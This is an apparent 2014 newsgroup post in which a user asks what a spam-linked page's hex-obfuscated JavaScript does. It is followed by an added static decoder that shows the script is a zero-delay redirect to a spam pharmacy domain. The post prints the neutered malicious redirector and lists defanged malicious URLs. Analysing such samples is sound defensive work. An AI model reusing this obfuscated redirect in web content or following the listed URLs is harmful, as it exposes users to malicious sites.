Subject: Can anyone ID or decode this javascript? (Feb 17 / 2014)
Posted by: Virus Guy (Viru…@Guy. com)
Date: Mon, 17 Feb 2014

The following link was contained in a spam email. It probably tries to
trigger a browser exploit of some sort, so handle this with care:

hxxp://202.29.80.23/~info/sensors.php

The server responds with this:

============
<html><body><script type="text/hello">ykzjr1="\x30";
lufrv2="\x68\x74\x74\x70\x3A\x2F\x2F\x6E\x75\x72\x73\x69\x6E\x67\x70\x68\x61\x72\x6D\x2E\x63\x6F\x6D";
setTimeout("\x77\x69\x6E\x64\x6F\x77\x2E\x74\x6F\x70\x2E\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x68\x72\x65\x66\x3D\x6C\x75\x66\x72\x76\x32\x3B",ykzjr1);
</script></body></html>
=============

Just in case the above would have executed for some readers, I replaced
"javascript" with "hello" on the first line. The above would have given
this news server a "line too long" error, so I broke the line after the
";" in various locations (if it matters).

What does that script decode to, or try to do?

Is there an on-line javascript decoder that would have processed the
above and given some sort of report or decoded result?

VT URL scan gives 2 / 53 in terms of detection as a malicious site
(based on IP / domain of URL and not on contents or files returned?)

VT scan on "sensors.php" returns 2 / 50:

Avast JS:Redirector-BOX [Trj]
Ikarus JS.Redirector

Another URL from another recent spam:

hxxp://snipsandclips4kids.com/restate.php
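
Added example, not part of the original post: a static decoder for the script quoted above. It treats the sample as text, decodes the `\x` escapes without executing anything, and defangs the result. The function names (`decodeEscapes`, `defang`, `analyze`) are illustrative, and the simple `name="literal";` matching is an assumption that fits this sample only.

```javascript
// Static look at the script from the post: the sample is handled purely as
// text and is never eval'd. String.raw keeps the backslashes literal.
const SAMPLE = String.raw`ykzjr1="\x30";
lufrv2="\x68\x74\x74\x70\x3A\x2F\x2F\x6E\x75\x72\x73\x69\x6E\x67\x70\x68\x61\x72\x6D\x2E\x63\x6F\x6D";
setTimeout("\x77\x69\x6E\x64\x6F\x77\x2E\x74\x6F\x70\x2E\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x68\x72\x65\x66\x3D\x6C\x75\x66\x72\x76\x32\x3B",ykzjr1);`;

// Decode \xNN and \uNNNN escapes found inside a string-literal body.
function decodeEscapes(body) {
  return body.replace(/\\x([0-9A-Fa-f]{2})|\\u([0-9A-Fa-f]{4})/g,
    (_, x, u) => String.fromCharCode(parseInt(x || u, 16)));
}

// Defang URLs so decoded output can be pasted into a report safely.
function defang(text) {
  return text.replace(/\bhttps?:\/\/[^\s"']+/gi,
    (url) => url.replace(/^http/i, 'hxxp').replace(/\./g, '[.]'));
}

// Assumption: the sample only uses `name="literal";` assignments and the
// string form of setTimeout, as in the post. This is not a JavaScript parser.
function analyze(source) {
  const vars = {};
  for (const m of source.matchAll(/(\w+)\s*=\s*"((?:[^"\\]|\\.)*)"\s*;/g)) {
    vars[m[1]] = decodeEscapes(m[2]);
  }
  // A string as the first setTimeout argument is evaluated as code later.
  const t = source.match(/setTimeout\(\s*"((?:[^"\\]|\\.)*)"\s*,\s*(\w+)/);
  const code = t ? decodeEscapes(t[1]) : null;
  // Resolve a `location.href=<name>` target against the decoded variables.
  const r = code && code.match(/location\.href\s*=\s*(\w+)/);
  return {
    vars,
    code,
    delay: t ? vars[t[2]] : null,
    redirect: r ? vars[r[1]] || null : null,
  };
}

const result = analyze(SAMPLE);
console.log(defang(JSON.stringify(result, null, 2)));
```

The decoded `code` field shows a top-level redirect with a zero delay, which matches the `JS:Redirector` / `JS.Redirector` labels in the scan results.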